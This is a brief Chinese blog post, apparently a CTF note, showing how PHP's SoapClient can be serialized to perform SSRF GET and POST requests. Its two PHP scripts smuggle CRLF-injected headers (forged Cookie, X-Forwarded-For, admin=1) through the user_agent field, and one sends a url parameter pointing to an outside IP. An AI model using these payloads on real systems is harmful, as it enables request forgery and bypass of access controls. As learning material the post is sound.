php内置类SoapClient既能发送get传参也能发送post传参

调用一个SoapClient类的对象的不存在方法时,SoapClient类会发送一个独立的http请求,是独立、纯净的http请求,没有换行覆盖其他数据什么的,只是在请求内部构造正常的换行。

 

SoapClient发送get请求:

<?php
$target='http://127.0.0.1/flag.php';
$b = new SoapClient(null,array('location' => $target,
    'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",
    'uri' => "http://127.0.0.1/"));

$se = serialize($b);
echo "|".urlencode($se);

 

SoapClient发送post请求:

<?php
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_string = 'message=iwantflag&url=http://1.116.110.61:5000';
$headers= array(
   'X-Forwarded-For:127.0.0.1',
   'Cookie:admin=1'
   );

class fxxk{
    public $par0;
    public $par1;
    public $par2;
    public $par3;
    public $kelasi;
    
    public function __construct(){
        $this -> par0 = 'SoapClient';
        $this -> par1 = NULL;
        $this -> par2 = array('location'=> 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php','user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.'X-Forwarded-For: 127.0.0.1^^Cookie: admin=1'.'^^Content-Length: '.'46'.'^^^^'.'message=iwantflag&url=http://1.116.110.61:5000','uri'=>"peri0d");
        $this -> par3 = 'unser';
    }
}

$aaa = new fxxk();
$aaa= serialize($aaa);
$aaa= str_replace('^^','%0d%0a',$aaa);
$aaa= str_replace('&','%26',$aaa);
echo $aaa;

 

posted @ 2022-12-05 16:44  Galio  阅读(396)  评论(0编辑  收藏  举报